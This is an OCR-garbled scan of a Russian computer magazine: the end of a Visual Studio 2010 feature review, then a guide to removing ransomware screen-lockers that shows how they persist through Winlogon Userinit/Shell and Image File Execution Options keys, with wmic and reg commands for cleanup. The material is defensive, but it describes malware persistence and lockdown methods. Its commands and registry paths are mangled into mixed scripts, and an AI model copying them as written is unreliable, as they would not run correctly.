в режиме отладки. В новой версии окош- 
ко подсказки можно закрепить в удобном 
месте основного окна редактора с тем, 
чтобы оно не исчезало после того, как ты 



переместишь мышку, и даже снабдить его 
комментарием. Настройки этого окна- 
подсказки сохраняются даже после пере- 
запуска отладчика. 

Сами точки останова теперь можно груп- 
пировать, именовать и, соответственно, 
сортировать по имени. Ими также можно 
обмениваться, так как списки точек оста- 
нова поддерживают экспорт и импорт во 
внешние файлы. 

Принципиально новый инструмент отлад- 
ки — ІпІеШТгасе, который можно условно 
назвать «исторический отладчик». Это 
имя достаточно точно передает суть его 
работы: отладочная информация накапли- 
вается в процессе отладки от итерации 
к итерации. Представим себе типичный 
сценарий: ты активно работаешь над про- 
ектом, вносишь изменения, компилиру- 
ешь, запускаешь его и вдруг: код, который 
в предыдущей сессии отладки работал, 
как надо, выбрасывает ошибку! До сих пор 
самым распространенным действием был 
возврат к пошаговой отладке: ты устанав- 
ливал точку останова до сбойного места и 
шаг за шагом двигался по коду, проверяя 
переменные, значения которых могли при- 
вести к сбою. Теперь же, вместо кропот- 
ливой повторной отладки кода, ты можешь 
передвигаться по истории отладки, 
собранной в специальном окне, сравнивая 
текущие значения переменных, которые и 
привели к сбою, с ними же, но из сессий 
отладки, закончившихся успешно. 

Любой разработчик знает, насколько слож- 
но отлаживать многопоточные приложения 
по сравнению с выполняющимися в одном 
потоке. А если при этом твое приложение 
выполняется в системе с несколькими про- 
цессорными ядрами или даже физическими 
процессорами? А ведь от этого уже нику- 
да не деться: даже бюджетные ноутбуки 
имеют минимум по паре ядер. Учитывая, 
что поддержка параллельного выполнения 
в полной мере была реализована на уровне 
.ІЧЕТ Егатеѵѵогк 4, который будет доступен 
одновременно с выходом Ѵізиаі Зіисііо 2010, 
было бы странно, если бы отладчик среды 
разработки не предоставлял бы удобный 
инструментарий для потоковой отладки. И 
такой инструментарий был создан. 
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Результаты тестирования 




Основное окно результатов 
профилирования 



Для поддержки отладки параллельных 
вычислений в Ѵізиаі ЗРисІіо 2010 появи- 
лись два новых окна отладчика: состоя- 
ния стеков ( Ра га Не I Эіаскз] и состояния 
задач ( Ра га Не I Тазкз]. Как следует из 
названий, первое окно предоставля- 
ет информацию о реальном состоянии 
стеков на каждом из ядер. Для удоб- 
ства работы сегменты стека, общие для 
нескольких потоков, объединяются в 
общие группы, при этом поддерживают- 
ся различные режимы отображения: на 
уровне потока или задачи. Окно задач 
в свою очередь представляет собой 
список задач с подробной информаци- 
ей об их статусе: какая задача выпол- 
няется, а какая только стоит в очереди 
на выполнение. Тут же отображается 
идентификатор и информация о потоке, 
закрепленном за этой задачей, а также 
масса другой полезной отладочной 
информации. Эта информация позволяет 
быстро выявить потенциальные пробле- 
мы, связанные с выполнением в пото- 
ках, например, блокировки процессов 



(беасііоск). Но функциональность данного 
окна не ограничивается лишь отображе- 
нием: ты можешь переключаться между 
задачами, устанавливать метки (флажки], 
приостанавливать и разрешать выполне- 
ние потоков. 

ПРОФАЙЛЕР И ВОЗМОЖНОСТИ 
ДЛЯ ТЕСТИРОВАНИЯ 

Впрочем, код, свободный от дефектов 
— это лишь половина успеха проекта. 
Раздражающая медлительность програм- 
мы сродни с критической ошибкой, и 
помочь с ее исправлением предназначен 
обновленный профайлер Ѵізиаі Эіибіо 
2010 — средство для анализа произво- 
дительности отдельных участков кода. 

Так, поддержка параллельной разработки 
не могла обойти стороной и встроенный 
профайлер: к списку поддерживаемых 
опций была добавлена новая — конку- 
рентное профилирование (Сопсиггепсу 
РгоЛІіпд), делающая профилирование 
многопоточных приложений столь же 
интуитивно понятным и простым, как 
однопоточных. 

Практически любое современное при- 
ложение, так или иначе, связано с дан- 
ными. Для профилирования многоуров- 
невых приложений предназначен новый 
инструмент — Тіег Іпіегасііоп Ргоіііег. 

С его помощью ты можешь собрать и 
проанализировать количество обраще- 
ний к данным и время, затраченное на 
их выполнение. А если ты разрабатыва- 
ешь веб-приложение, то этот инструмент 
представит отчет о количестве вызовов 
той или иной страницы и времени, затра- 
ченного на ее обработку. Кроме того, для 
А5Р.ЫЕТ появилась возможность профи- 




I Обсуждая новые возможности Ѵізиаі 
Эіибіо 2010 нельзя не вспомнить о .ЫЕТ 
Егатеѵѵогк 4, который традиционно выхо- 
дит одновременно со средой разработки 
и тесно с ней интегрирован. Ниже пере- 
числены лишь некоторые, на мой взгляд, 
наиболее важные функции новой версии: 

• Новый сборщик мусора обладает повы- 
шенным быстродействием благодаря 
выполнению сборки в старших поколе- 
ниях без необходимости останавливать 
работу приложений в безопасных точках. 

• Введены новые типы: Відіпіедег и 
Сотріех. Суть их использования следует 
из их названий. Отмечу только, что новый 
тип целого может хранить и выполнять 
обычные числовые операции над величи- 
нами, фактически ограничиваемыми лишь 
размером доступной оперативной памяти. 
• Новый модуль .ЫЕТ Егатеѵѵогк — 
Мападеб Ехіепзібііііу Егатеѵѵогк (МЕЕ) 

— отвечает за расширение функциональ- 
ности готовых приложений при помощи 
подключаемых модулей (плагинов). 
Разработчику нужно лишь при создании 
программы указать точки, в которых воз- 
можно такое расширение. Такое прило- 
жение сможет самостоятельно находить 
и подключать расширения, выполненные 
с использованием МЕЕ. Эту технологию 
можно также использовать и при созда- 
нии расширений самой Ѵізиаі Эіибіо 2010. 
• Как указывалось выше, .ЫЕТ Егатеѵѵогк 
4 получил поддержку параллельного 
выполнения приложений на многоядер- 
ных системах. Для этого была создана 
новая библиотека Эузіет.ТЬгеабіпд. 

• Разработчики, работающие на ѴѴРЕ 
получили три новых элемента управления: 
Баіабгіб, Саіепбаг и БаіаРіскег, поддерж- 
ку разработки для мультисенсорных экра- 
нов, полностью переработанную систему 
визуализации текста и улучшенное взаи- 
модействие с данными. 



лирования сценариев баѵаЭсгірі в кон- 
тексте их выполнения движком Іпіегпеі 
Ехріогег 8. 

Благодаря полной интеграции с редакто- 
ром, профайлер может подсвечивать в коде 
важные в плане производительности места, 
например, операции, наиболее критичные 
для производительности данного модуля в 
целом. 

Для разработки высокопроизводительных 
приложений, кроме обновленного про- 
файлера, были созданы специальные 
средства нагрузочного тестирования и 
тестирования производительности, что 
будет особенно интересно разработчикам 
веб-приложений. Используя эти средства, 
ты можешь создавать группы тестовых 
компьютеров для эмуляции повышенной 
нагрузки на ваши приложения, а также 
имитировать пониженную пропускную спо- 
собность сети. 



► 028 
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А КАК ЖЕ КЕ5НАКРЕР? 



Практически одновременно со средой Ѵізиаі Эіисііо 
2010 будет выпущена новая версия одного из луч- 
ших её расширений — ЭеіВгаіпз РеЭЬагрег ( ѵѵѵѵѵѵ. 
ІеіЬгаіпз.сот ). Этот продукт предоставляет широкий 
спектр возможностей статического анализа и под- 
светки ошибок в коде, навигации по проектам, гене- 
рации кода и выполнения юнит-тестов. 

В новой, пятой версии РеЭЬагрег, помимо под- 
держки Ѵізиаі Эіисііо 2010, С# 4 и ѴВ10, многократно 
улучшена работа с А5Р.ЫЕТ и введены специальные 
средства для разработчиков А5Р.ІЧЕТ МѴС. Анализ 
кода усилен новыми проверками, возможностями 
изучения иерархии вызовов и потока данных, преоб- 
разования циклов в конструкции ЫЫО и просмотра 
всего неоптимального кода в пределах решения, 
проекта или папки. 

Среди других полезных нововведений — структур- 
ный поиск и замена фрагментов кода, просмотр 
исходного кода библиотек, помощь при локализации 
проектов и новые рефакторинги, работающие на 
проектном уровне. 
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К уже имеющимся функциям для тестирования при- 
ложения добавился ряд новых, самой интересной из 
которых является автоматическое тестирование поль- 
зовательского интерфейса. Работать с такими тестами 
легко и приятно: разработчик создает новый тестовый 
проект, а затем запускает автоматическую запись дей- 
ствий над интерфейсом при помощи специального 
диалога и производит предусмотренные тестовым зада- 
нием действия. Результат работы — тестовый проект на 
С# или ѴВ по выбору разработчика, в который можно 
легко вносить дополнения и изменения в точности, как 
в обычный проект. Этот процесс чем-то напоминает 
запись макрокоманд в МісгозоІТ Ехсеі, в результате 
которого получается код на Вазіс, повторяющий выпол- 
ненные действия. 

ЕХРРЕЗЗ-ВЕРСИИ БЫТЬ! 

Состав и названия редакций Ѵізиаі Эіисііо 2010 
также претерпел некоторые изменения. Теперь будут 
доступны следующие редакции: Шіітаіе, Ргетіит, 
Ргоіеззіопаі и Ехргезз. Описанная выше функциональ- 
ность доступна не во всех редакциях Ѵізиаі Эіисііо 
2010, поэтому при переходе надо уточнить: поддержи- 
вает ли выбранная редакция нужные функции или нет. 
Но самое главное, что у всех нас по-прежнему остается 
возможность использовать бесплатную версию Ѵ5! 

Если не требуются функции управления жизненным 
циклом продукта, а проект рассчитан на одного-двух 
разработчиков, установи себе свободную Ехргезз- 
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> ІПІО 

Автор статьи за- 
нимается развитием 
средств разработки 
Місгозоіі в России 
и с радостью ответит 
натвои вопросы 
по мейлу -ѵігаікіб 
тісгозоіі.сот 



ІпІеІІіТгасе в действии 



версию Ѵізиаі Эіисііо 2010 — и тебе ее совершенно 
точно будет достаточно. 

Стоит ли переходить на новую версию? Конечно! Если 
бета-версия еще грешила некоторыми багами, то уже в 
РС все работало совершенно стабильно. Единственное, 
что может пока остановить — это отсутствие для новой 
версии Ѵізиаі Эіисііо обновленных версий расширений, 
которые ты возможно используешь. Но это лишь вопрос 
времени. А сейчас стоит хотя бы раз попробовать 
новую версию и возвращаться к старой, пусть даже и 
более привычной версии ЮЕ, не будет ни малейшего 
желания. т 
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I Степан «51ер» Ильин іѵѵіІег.сот/зІераЬ 





БЛОЧИМ 



БЛОКЕРЬ 







Полный мануал по борьбе 
с блокираторами 



I 



«Ваша система заблокирована! для активации необходимо отправить 
код «хакер» на короткий номер 31337». Под каким только предлогом 
не заставляют ушастого отправить дорогущую ЗМЗ, убеждая его в том, 
что компьютер завирусован, или то, что МісгозоН поймала его за нелицен- 
зионную винду, или, в конце концов, за то, что он посмотрел в Инете «клуб- 
ничку». Развод срабатывает. 



Н азвание «Т го]а п.ѴѴі п Іоск» характери- 
зует целую отрасль в вирусостроении, 
когда малварь не скрываетсебя в си- 
стеме, а наоборот всячески показыва- 
ет свое присутствие, блокируя работу 
пользователя. Сначала способы выманивая 
денег напоминали скорее вымогательства 
(именно поэтому класс вирусов называется 
Напзотѵѵаге — от английского слова гапзопп, 
выкуп], явноуказывая нато, чтоэкран блоки- 
рует вирус и сдастся он только после отправки 
5М5 на платный номер. Позже, методы раз- 
вода стали более изящными: пользователей 
припугивают, что появившееся окно является 
новой системой защиты МісгозоТС по борьбе с 
нелицензионным ПО, разыгрываютнеплохой 
спектакль, прикидываясь антивирусом, кото- 
рый разом находит кипу вирусов в системе и так 
далее — главное, что во всех случаях проблемы 
предлагается быстро решить отправкой на 
короткий номер 5М5. 

КАК РАЗЛОЧИТЬ СИСТЕМУ? 

Блокираторы могут ограничивать пользователя 
в посещении определенных страниц (напри- 
мер, Яндекса, Одноклассников, а также сайтов 



антивирусных компаний), в использовании 
браузера, но больше всего тех, и они серьезнее 
всех других, версий малвари, которая блокиру- 
ют доступ к ресурсам операционной системы. 
Подхватив заразу, пользователь нарывается 
на то самое окно, в котором ему предлагается 
ввести код для разблокировки, полученный 
после отправки 5М5 на указанный номер. При 
этом выполнить какие-либо другие действия 
на компьютере невозможно или практически 
невозможно. Приложение либо вообще запре- 
щает любые операции в системе, ограничивая 
поле деятельности активным окном, либо же 
внимательно следит за тем, что делает пользо- 
ватель. Например, если юзер ломится за анти- 
вирусом, то вирус, определив ключевые слова 
в заголовке окна, тут же закрывает браузер. В 
любом случае, даже самые продвинутые бло- 
керы — малварь, как правило, примитивная. 
Всяко не руткитТОБЗ, который хитроумным 
способом прячется в недрах системы. Все, что 
требуется от блокиратора — хорошенько огра- 
ничить пользователя в действиях и по возмож- 
ности отрубить антививирусы (с чем, кстати, он 
нередко справляется]. Так или иначе, заразу 
довольно легко удалить как вручную, так и с 



помощью многочисленных антивирусных тулз 
(о них ниже). 

Главная загвоздка в том, что компьютер 
заблокирован, и заблокирован, если ты, 
конечно, не подцепил малварь столетней дав- 
ности, довольно жестко. Но если получится 
добраться до системы, то можно заюзать 
вспомогательные инструменты и избавиться 
от заразы, но как это сделать? 

Первые версии блокеров было легко обма- 
нуть, даже банальной перезагрузкой в безо- 
пасный режим. Далее можно либо скачать и 
запустить какой-нибудь антивирусный сканер, 
либо же расправиться с заразой вручную. 
Последние модификации блокираторов умело 
блокирует все возможные варианты подхода к 
системе, поэтому и пути приходится использо- 
вать обходные. 

1. Очевидно, что если выгрузить блоки- 
рующий процесс из памяти, то можно 
вернуть ОС к нормальному состоянию. 

И если с локального компьютера запу- 
стить менеджер задач не получается, то 
можно попробовать кильнуть процесс 
малвари удаленно, воспользовавшись 
другим компьютером в сети. 



► ОЗО 
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Анлокер от йг.ѴѴеЬ 



Выгружаем процесс на удаленной 
машине через командную строку 
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Для этого использоваться оболочка ѵѵтіс 
(ѴѴМІ Соттапб-Епе], которой в каче- 
стве параметров можно передать адрес 
удаленной машины и имя пользователя, 
получив таким образом возможность 
выполнять команды удаленно: 

ѵѵтіс /Ж)БЕ:<имя компьютера или 
сетевой адрео (например / 

N001 1 192 Цб8. 1.12) /1Т8ЕК : <имя 
пользователя на зараженной машине> 
(например, /бЗЕКіуазбер) 

После того как ты введешь пароль указан- 
ного в параметрах пользователя, появится 
интерактивная консоль. Управление про- 
цессами осуществляется с помощью коман- 
ды ргосезз. Если запустить ее без пара- 
метров, то на экране отобразится список 
процессов на удаленной системе. Дальше 
подход нехитрый: ищем подозрительные 
процессы и последовательно удаляем их с 
помощью все той же команды и ее ключа 
беіеіе: 

ргосезз ѵЛтеге паше="<имя процес- 
са^’ сіеіебе 



В результате получаем разблокированную 
систему, в которой можно приступать к лече- 
нию, о котором мы поговорим ниже. 

2 . Имея дело с ѴѴіпбоѵѵз ХР/2000, можно 
попробовать нажать на клавиатуре комби- 
нацию <ѴѴІ N - И > — должно появиться окно 

с активацией специальных возможностей, у 
которого очень большой приоритет и далеко 
не все трояны умеют эту ситуацию обрабаты- 
вать. Далее запускаем экранную лупу и в поя- 
вившемся окне с предупреждением кликаем 
на ссылку «Веб-узел Майрософт», после чего 
запускается браузер, через который можно 
достучаться до любого исполняемого файла. 

3. Логично, что если добраться до реестра 
и файловой системы непосредственно из 
системы не получается, то можно попробовать 
сделать это с помощью другой ОС. Самый 
очевидный вариант — загрузиться с ЫѵеСО. 
Один из самых подходящих дистрибутивов, 
который поможет реанимировать систему, 
называется ЕНО Соттапбег. В торрентах 
широко распространен образ, включающий в 
себя версии продукта для реанимации разных 
ОС: 5.0 — для ѴѴіпбоѵѵз ХР, 6.0 — для ѴѴіпбоѵѵз 
Ѵізіа, 6.5 — для ѴѴіпбоѵѵз 7/5егѵег 2008 Р2. В 
результате получаем удачно созданный загру- 



зочный билд винды, откуда можно запустить 
практически любые вспомогательные тулзы. 
Помимо таких таких гезсие-наборов идеально 
подойдут специальные ЕіѵеСО от антивирус- 
ных компаний, которые уже имеют на борту 
средства для удаления заразы: Ог.ѴѴеЬ ЕіѵеСО 
[ ѵѵѵѵѵѵбгеебгѵѵеЬ.сот/Ііѵесб ] и Казрегзку 
Везсие Оізк [ беѵбиіібз. казрегзку- Іа Ьз.сот/ 
беѵЬиіІбз/РезсиеРізк ). 

4 . Несмотря на то, что этот способ стоит 
последним, попробовать его нужно в первую 
очередь. По правде говоря, когда я впервые 
увидел блокеры, то наивно верил, что для 
генерации кодов используются хитрые алго- 
ритмы, а вариантов ключа бесконечно много 
— в общем, считал, что используется сложный 
генератор, как для у шароварных программ. 

На деле же оказалось, что у большинства 
блокеров ключ защит внутрь в единственном 
экземпляре, у других используется крайне 
примитивные алгоритмы, как, например, 
разные ключи в зависимости от дня недели. 

К тому же, тело вируса нередко очень про- 
сто отреверсить и извлечь оттуда готовый 
алгоритм для генерации ключей. Этим, 
естественно, не преминули воспользоваться 
энтузиасты, собравшие базы таких ключей 
для разблокировки, и антивирусные ком- 
пании, составившие базы «короткий номер 
5М5 — код для отправки — алгоритм состав- 
ления ключа для разблокировки». Сейчас 
такие онлайн сервисы есть у всех популярных 
отечественных вендоров: 

• Лаборатория Касперского: 
зиррогЕ казрегзку. ги/ѵі ги зез/беЫоскег : 

• Ог.ѴѴеЬ: 

ЬЕрУ/ѵѵѵѵѵѵ.бгѵѵеЬ.сот/ипІоскег/іпбех ; 

• ЕзеЕ ѵѵѵѵѵѵ.е5еІ:поб32.ги/.5иррог1:/ѵѵіп[оск . 

Помимо этого для офлайного использования 
есть программа ПапзотНібе [ ШрУ/зоЕаеС 
пеі/ітееѵѵаге/ргощсІз/РапзоппНібе/гапзоітіЬібе. 
ехе і. Пробив номер для отправки 5М5 и 
текст сообщения, с большой вероятностью 
можно получить рабочую комбинацию для 
разблокировки и получить работоспособную 
систему. Но тут надо понимать, что зараза 
по-прежнему остается в системе, поэтому ее 
все равно необходимо удалить. 

РУЧНОЕ УДАЛЕНИЕ 

Самый верный способ обезвредить и удалить 
тело вируса, — отыскать, где она успела про- 
писаться для автоматического запуска на 
старте системы. Вариантов очень много, и 
описывать все было бы просто глупо (в конце 



концов, с задачей неплохо справляются такие 
тулзы, как Нцаскбпіз, Аиіюгипз и 05АМ]. Но 
есть способ, который именно блокеры любят 
больше всего, и о нем грех не рассказать. 

В реестре винды есть ключ НКЕМ\50ЕТѴѴАПЕ\ 
МісгозоііАѴѴіпбоѵѵз ЫТ\Сиггеп1;Ѵег5Іоп\ѴѴіпІодоп\ 
изегіпіЕ который определяет программы, кото- 
рые ѴѴіпІодоп запускает, когда пользователь 
входит в систему. По умолчанию, ѴѴіпІодоп 
запускает файл ІІзегіпіЕехе, который в свою 
очередь стартует Іодоп-скрипты, устанавливает 
сетевые подключения, а затем запускает и 
Ехріогег.ехе, т.е. пользовательский интерфейс 
ѴѴіпбоѵѵз. Прописав до ІІзегіпіЕехе путь до 
какой-нибудь программы, можно запустить 
ее, прежде чем стартует интерфейс ѴѴіпбоѵѵз 
Ехріогег, а, прописав после, — обозначить старт 
конкретного приложения сразу после появле- 
ние пользовательского интерфейса. Блокеры 
очень часто изменяют этот ключ, дописывая 
путь до своего исполняемого файла: 

ІІзегіпіС = %зузЕешЕо1сіег%\ 
изегіпеЕ . ехе , [путь до исполняемо- 
го файла блокера] 

Само тело вируса обычно размещается где- 
нибудь в неприметном месте. Как вариант, при- 
кидываясь временным файлом с расширением 
Ітр, оно находится в каталоге с временными 
файлами ѴѴіпбоѵѵз. Обнаружив в этом ключе 
подозрительные записи, удаляем подозри- 
тельные бинарники и возвращаем значение 
ключа до «%зуз1:ет[оІбег%\и5егіпіЕехе». Другой 
распространенный способ для автозапуска для 
блокеров - прописаться в ключе збеіі (нахо- 
дится в том же разделе реестра, что изегіпіЕ], 
заменив стандартное значение ехріогег.ехе на 
путь до зловредного бинарника. 

Способов на деле очень много, но если 
отыскать подозрительные записи в реестре, то 
легко удалить и тела вирусов. Правда, неко- 
торая малварь идет на самую малую хитрость 
и размещает свои файлы в скрытых потоках 
на диске, но тем проще ее обнапужить. Какие 
еще приложения используют такую возмож- 
ность ІЧТЕ5? Да никакие. Удалить их несложно 
с помощью утилиты зітеатз [ іесЬпеСтісгозоІС 
сот/еп-и5/5Ѵ5ІпІегпа[5/ЬЬ897440.азрх 1 от Марка 
Руссиновича, запустив в консоли: "зітеатз. ехе 

-б -5 С:\". 

ЗОВЕМ помощников 

Чтобы не ковыряться с файловой системой и 
реестром вручную, устраивая охоту на мал- 
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варь (а нам — не превращать материал в 
описание тех мест в системе, где может 
обосноваться малварь], можно воспользо- 
ваться антивирусными программами, в том 
числе бесплатными вариантами коммерче- 
ских продуктов (естественно предваритель- 
но разблокировав систему): 

• Казрегзку Ѵішз Ретоѵаі Тооі [ аѵрІооЕ 
ѵігизіпію.іпію ) — бесплатная вариация про- 
дукта от Лаборатории Касперского, исполь- 
зующая тот же движок и сигнатурные базы, 
но не предоставляющей постоянной защи- 
ты. Прога делает как раз то, что нам нужно 

— одноразовое сканирование. При этом 
сигнатуры зашиты в дистрибутив, поэтому 
перед каждым использованием его необхо- 
димо закачивать заново. 

• Ог.ѴѴеЬ СигеШ [ ѵѵѵѵѵѵ.ІтеебгѵѵеЬ.сопп/сигеіІ: ) 

— полностью аналогичное решение, с той 
лишь разницей, что разработано другой 
антивирусной лабораторией. 

Блокиратор — не руткит, и с удалением 
такой заразы справится всякий антивирус. 
Впрочем, если доверия к аверам нет или ты 
хочешь сам более подробно разобраться, 
как зараза осела в системе, то неоцени- 
мую помощь тебе подскажут две утилиты, 
которые стали своеобразным стандартом 
де-факто в ручном поиске вирусов: 

• А МТ [ ѵѵѵѵѵѵ.г-оіед.сот/зесиг/аѵг ) — несмо- 
тря на то, что в этой программе есть типо- 
вой сигнатурный сканер, в первую очередь 
утилиту нужно воспринимать, как полуав- 
томатический антивирус. Самое главное 

— она позволяет не копаться вручную в рее- 
стре и на жестком диске в поисках подозри- 




тельных записей и файлов. АѴ2 выполняет 
поиск малвари по косвенным признакам, 
анализируя реестр, файловую систему и 
память, после чего выдает юзеру отчет для 
осмысления. При этом для анализа исполь- 
зуется прямой доступ к диску, позволяя 
избежать спуфинга малварью результатов 
вызова АРІ-функций. 

• ЩаскТЫз [ Фее.апБѵігиз.сот/ЬдаскіЫз ] — 

так же, как и АѴ2, сама ничего не лечит, но 
при этом проверяет области системы, наи- 
более подверженные изменениям малва- 
рью. Тулза сканирует критические области 
реестра и выводит полный список найден- 
ных ключей, некоторые из которых могут 
принадлежать вредоносным программам и 
вирусам. 

Обе программы в тандеме используются 
на различных зесигБу-форумах, где людям 
помогают избавиться от вирусов, в том 
числе на самом крупной российском ресур- 
се ѵігизіпФ.іпЬ . Пользователи выкладывают 
логи, полученные с помощью АѴ^/НцаскТЫз, 
а эксперты в качестве ответа присылают 
скрипты-сценарии, которые легко выпол- 
няются с помощью мощного движка А М2. 

Для сбора данных как для самостоятельного 
анализа, так и для обращения за помо- 
щью к компьюнити нужно запустить АѴ2 и 
через меню «Файл -> Стандартные скрип- 
ты» выполнить скрипты «Скрипт лечения/ 
карантина и сбора информации для раз- 



дела «Помогите!» ѵігизіпію.іпію» и «Скрипт 
сбора информации для раздела «Помогите!» 
ѵігизіпію.іпію». В отчете ты получишь под- 
робную инфу о запущенных процессах и 
сервисах, подгруженных драйверах, инжек- 
тированных в процессы ОББ-библиотеках, 
надстройках для Іпіюгпеі: Ехріогег и всем- 
всем, что только может помочь для анализа. 
Причем отчет выполнен в фориате НТМБ, так 
что ты на месте можешь создавать сценарий 
для удаления тех или иных файлов, ключей 
реестра и других манипуляций в системе, 
которые помогут избавиться от малвари. 

ЕСЛИ ЧТО-ТО ОТКЛЮЧЕНО 

Увы, даже после удачного удаления процесса 
из памяти и тела малвари с диска, в системе 
иногда остаются остаточные явления от дея- 
тельности блокера, заключающиеся, напри- 
мер, в невозможности запустить редактор 
реестра. Чем более кривой вирус попался, 
тем больше ждать таких вот ограничений. В 
большинстве случаев это можно поправить 
через реестр в разделе НКЕѴ_СиНПЕІ\ІТ_ 
Б5ЕВ, определяющем работу системы для 
текущего пользователя, а также НКЕУ_ЕОСАЕ_ 
МАСНІЫЕ, в котором задаются настройки для 
всех пользователей сразу. 

Начать надо с того, что вполне может не запу- 
скаться сам редактор реестра. Если этого про- 
изошло, то придется внести поправить ключи 
реестра ОізаЫеПедесІіІ: и ВізаЫеНедізіхуТооІз: 



Выполняем скрипты АѴ2 

для анализа системы 



ЫѵеСО дистрибутив с Ог.ѴѴеЬ 

на борту умещается в Во Мб 



Меню для выбора ОС в ЕВО 

Соттапсіег 
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ПОНЕМУ КОРОТКИЕ НОМЕРА ДЛЯ ПЛАТНЫХ ЗМЗ НЕ ПРИКРЫВАЮТ? 



Для того чтобы принимать платежи через 5М5 необязательно идти на контакт с сотовым оператором. Существует огромное количество 
компаний, которые на своем сайте предлагают посреднические услуги и удобные интерфейсы для внедрения такого способа платежей. 
Просто набери в Соодіе'е «зтз биллинг» и поймешь, насколько много подобных предложений. Кстати, практически любой короткий 
номер, будь он из рекламы, блокиратора или откуда-либо еще, довольно легко пробить через Соодіе и найти обслуживающий его бил- 
линг с указанием реальной стоимости, которая за него снимается. 

Как правило, у биллинга есть строгие правила, которые не позволяют использовать их мошенникам. Даже если последним удается 
пройти первичный контроль модератора, аккакунт блокируется при первом же факте обнаружения развода. Однако ситуация тут точно 
такая же, как и с хостингом: находятся люди и компании, готовые закрывать глаза на шалости клиентов, получая при этом соответствую- 
щее вознаграждение. Такие биллинги называются антиабузные. 

Несмотря на то, что пользователей, по сути, вынуждают отправить платную 5М5 очень мало, реальных случаев, чтобы человек подал 
заявление в милицию (а до недавнего времени не было вообще], поэтому блокираторы довольно успешно существовали почти полтора 
года. Чтобы обезопаситься, они, как правило, заключают договоры с биллингом на дропа или ИП, также зарегистрированного на доку- 
менты подставного человека. 

Впрочем, уже сейчас жить предприимчивым парням становится сложнее. Операторы стали жестко наказывать рублем контент- 
аггрегаторов и провайдеров, которых уличили во фроде. Более того, совершенствуется сама защита пользователей: после отправки 5М5 
на короткий номер, МТС с недавнего времени присылает абоненту ответную 5М5 с просьбой подтвердить оплату и указанием реальной 
стоимости отправленного сообщения. 



гед асісі НКЕМ\8оіЩлгаге\МісгозоіС\Міпс1сжз\ 
СиггепЦѴегзіоп\Ро1ісіез\ЗузСет /ѵ 
БізаЫеКедесІіЦ /С КЕО_ШОКБ /сі О 
гед асісі НКСП\8оіЦмаге\МісгозоіЦ\Мпс1сжз\ 
СиггепСѴегзіоп\Ро1ісіез\8узСет /ѵ 
БізаЫеКедесііЦ /С КЕО_ШОКБ /сі О 
гед асісі НКСи\8оіЩлгаге\МісгозоіС\Міпс1сжз\ 
СиггепЦѴегзіоп\Ро1ісіез\ЗузСет /ѵ 
БізаЫеКедізСгуТооІз /С КЕС_ШОКБ /сі О 

Это не всегда может помочь. Если у тебя в принципе не 
запускаются ехе-файлы, то надо попробовать выполнить 
гед-файл следующего содержания: 

Ш_псІоѵ73 ЕедізСгу ЕсііСог Ѵегзіоп 5.00 
[ НКЕУ_СЬАЗ 8Е 8_КООТ \ ехе і і 1 е \ зЪе 1 1 ] 

[ НКЕУ_СЬА8 8Е 8_КООТ \ ехе і і 1 е \ зЪе 1 1 \ ореп ] 
"ЕсііСЕІадз " =ііех :00, 00,00, 00 
[ НКЕУ_С Ь АЗ 8 Е 8_КООТ \ ехе і і 1 е \ зЪе 1 1 \ ореп \ 
согшпапсі] 

@="\"%1\» %*" 

[ НКЕУ_СЬА8 8 Е 8_КООТ \ ехе і і 1 е \ зЪе 1 1 \ гипа з ] 

[ НКЕУ_СЬАЗ 8 Е 3_КООТ \ ехе і і 1 е \ зЪе 1 1 \ гипа з \ 
согшпапсі] 

@="\"%1\» %*" 

Это поможет, если вирус переассоциирует запуск 
исполняемых файлов на себя. Помимо этого малварь 
может расстроить запуск приложений (например, того 
же гедебіЕехе] с помощью раздела НКЕМ\50ЕТѴѴАВЕ\ 
МісгозоііЛѴѴіпбоѵѵз ЫТ\Сиггеп1:Ѵег5Іоп\Ітаде Еііе ЕхесиЕоп 
ОрЕопз. Добавив ветку с названием исполняемого 
файла, можно заставить систему запускать приложение 
под отладчиком, который в свою очередь задается с 
помощью вложенного ключа БеЬиддег. Задать дебаггер 
можно неправильно, и запуск приложения не произой- 



дет. Удалить мешающие ключи реестра опять же удобно 
через командную строку: 

ЕЕС БЕЬЕТЕ «НКЕУ_ЬОСАЬ_МАСНІБЕ\ЗОЕТШАЕЕ\ 
МісгозоіС \Шіпсісхѵз ЫТ\СиггепРѴегзіоп\ Ітаде 
Еііе ЕхесиРіоп 0рСіопз\гедесііР . ехе" 




> іпіо 



Если приложение не запускается, ссылаясь на поли- 
тику ограничения использования программ, то тебе 
прямиком дорога в НКЕѴ_Е0САЕ_МАСНІЫЕ\50БТѴѴАВЕ\ 
РоІісіезѴМісгозоііѴѴѴіпбоѵѵзѴэаІеЛСобеІбепЕЕегзѴЛРаіЬз. 
Придется покопаться и перебрать ветки, выбрав те, кото- 
рые блокируют запуск нужного приложения. Если после 
удаления малвари не запускается диспетчер задач, то 
вероятнее всего его запуск ограничили с помощью ключа 
«ОізаЫеТазкМдг». Это легко правится гед-файлом: 

[НКЕУ_СШКЕЫТ_ІІ8ЕК\ЗоіЦ™аге\МісгозоіЦ\ 

Ѵ\Щп<бомз\СиггепЦѴегзіоп\Ро1ісіез\ЗузЦет] 

" БізаЫеТазкМдг " =сЬ\гогс1: 0 

БЛОКИРАТОР БРАУЗЕРОВ 

Еще одно ограничение, которое может остаться даже 
после удаления малвари, — всплывающие окна в браузе- 
ре. Иногда не убиваемый рорир с требованием отправить 
5М5 — единственный симптом вирусов. Увы, многие 
антивирусные продукты некоторые из ситуаций обра- 
ботать могут далеко не всегда, а именно когда малварь 
устанавливается как надстройка для Іпіегпех Ехріоге или 
как плагин к Рі геіох’у. Впрочем, избавиться от них проще 
простого, банально отключив подозрительные расшире- 
ния. В ІпТегпеі: Ехріогегдля этого необходимо перейти 
в «Управление надстройками» через меню «Сервис> 
Надстройки > Включение и отключение надстроек», а в 
Еігеіюх'е окно для управления дополнениями открывается 
через «Инструменты > Дополнения».^ 



Рекомендую обзаве- 
стись в системе утили- 
той РгосеззЕхрІогегот 
Марка Руссиновича, 
представляющую 
собой прокаченный 
таскменеджер. Если 
переименовать ехе- 
шник в какое-нибудь 
незамысловатое 
название есть шанс, 
что ты сможешь ис- 
пользовать его, если 
какая-то малварь 
заблокирует штатный 
менеджер задач. 
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■ ■ Брусіег зрусіеггаапіісііаі.пеі 

■ ■ Леонид «Сгйѵѵіег» Исупов сгаѵѵіеггахакер.ги 
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ХАКЕРСКИЕ 

СЕКРЕТЫ 

ПРОСТЫХ 

ВЕЩЕЙ 




ЗАДАЧА: ОБОЙТИ ФИЛЬТРАЦИЮ ПРО- 
